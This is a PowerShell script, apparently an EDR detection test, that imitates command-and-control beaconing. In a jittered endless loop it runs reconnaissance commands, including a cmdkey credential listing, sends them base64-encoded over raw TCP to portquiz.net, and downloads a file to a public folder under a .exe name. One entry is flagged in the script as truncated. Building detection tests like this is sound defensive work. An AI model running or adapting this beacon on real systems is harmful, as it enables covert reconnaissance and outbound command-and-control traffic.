# Test your EDR: run on an authorized test host and see whether it detects this simulated C2 beaconing and LOLBin activity.
# dchow[AT]xtecsystems.com
# Hard-coded "payloads" the beacon loop below picks from at random. Each one
# is base64-encoded and written to a remote socket (simulated C2 check-in) AND
# executed locally with Invoke-Expression (simulated LOLBin activity on the
# host). Everything in this list actually runs -- keep it benign, and never
# populate it from external input.
$payloads = @(
"cmd.exe /c whoami",
"cmd.exe /c cmdkey /list",
"cmd.exe /c route print",
"cmd.exe /c gpresult -R",
"cmd.exe /c set",
# Fetches index.html over plain HTTP and saves the response bytes under a
# .exe name in a world-writable public folder. The saved content is whatever
# the server returns for that page, not a compiled executable; the point is
# to trigger download-to-disk / suspicious-path telemetry.
"powershell.exe -Command IEX(New-Object System.Net.WebClient).DownloadFile(""http://portquiz.net/index.html"", ""C:\Users\Public\Downloads\pen_test_benign.exe"")",
# NOTE(review): the child -ArgumentList ends at "-Command" with no command
# text, and $path is assigned but never referenced. As written the hidden
# child powershell.exe is given nothing to run. This looks truncated --
# confirm the intended behaviour before relying on it for detection testing.
"powershell.exe -Command `$path = 'C:\Users\Public\Downloads\pen_test_benign.exe'; `$proc = Start-Process -FilePath powershell.exe -ArgumentList ""-nop -WindowStyle Hidden -Command"""
)
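# Beacon loop. Never exits on its own -- stop it with Ctrl+C. Each iteration:
#   1. picks one entry from $payloads (defined above),
#   2. probes portquiz.net:443 and, if reachable, opens a raw TCP connection
#      and writes the base64-encoded payload (simulated C2 check-in),
#   3. runs the payload locally so host-based telemetry fires too,
#   4. sleeps a randomized 60-599 s (Get-Random -Maximum is exclusive), which
#      gives the jittered cadence detections look for.
#
# Operator caveats:
#   - This sends data to a third-party host you do not control and executes
#     commands on this machine. Run it only on systems you are authorized to
#     test, and let the SOC know so the resulting alerts are expected.
#   - The "C2" traffic is plain TCP on port 443, not TLS; the remote end just
#     accepts and closes it. Nothing is encrypted.
#   - Invoke-Expression executes whatever string is in $payloads. The list is
#     hard-coded in this file; do not wire it to any external source.
while ($true) {
    $payload = Get-Random -InputObject $payloads
    $encodedPayload = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($payload))
    Write-Host "Sending payload: $payload"
    # -InformationLevel Quiet makes Test-NetConnection return a plain boolean.
    $result = Test-NetConnection -ComputerName portquiz.net -Port 443 -InformationLevel Quiet
    if ($result -eq $true) {
        Write-Host "Connection successful. Sending encoded payload:"
        Write-Host $encodedPayload
        $socket = $null
        $stream = $null
        $writer = $null
        try {
            $socket = New-Object System.Net.Sockets.TcpClient("portquiz.net", 443)
            $stream = $socket.GetStream()
            $writer = New-Object System.IO.StreamWriter($stream)
            $writer.Write($encodedPayload)
            $writer.Flush()
            # Only claim success after the write and flush actually completed.
            Write-Host "Payload sent successfully."
        }
        catch {
            # The reachability probe can pass and the connect/write still fail
            # (port closed between checks, connection reset by the peer).
            # Report it and continue beaconing rather than aborting the loop.
            Write-Host "Payload send failed: $($_.Exception.Message)"
        }
        finally {
            # Release the writer/stream/socket on every path, including errors,
            # so a long-running beacon does not accumulate open handles.
            if ($writer) { $writer.Close() }
            if ($stream) { $stream.Close() }
            if ($socket) { $socket.Close() }
        }
    }
    else {
        Write-Host "Connection failed. Skipping payload send."
    }
    # Local execution so LOLBin process telemetry fires, not just network events.
    Write-Host "Executing: $payload"
    Invoke-Expression $payload
    $sleepTime = Get-Random -Minimum 60 -Maximum 600
    Write-Host "Sleeping for $sleepTime seconds..."
    Start-Sleep -Seconds $sleepTime
    Write-Host ""
}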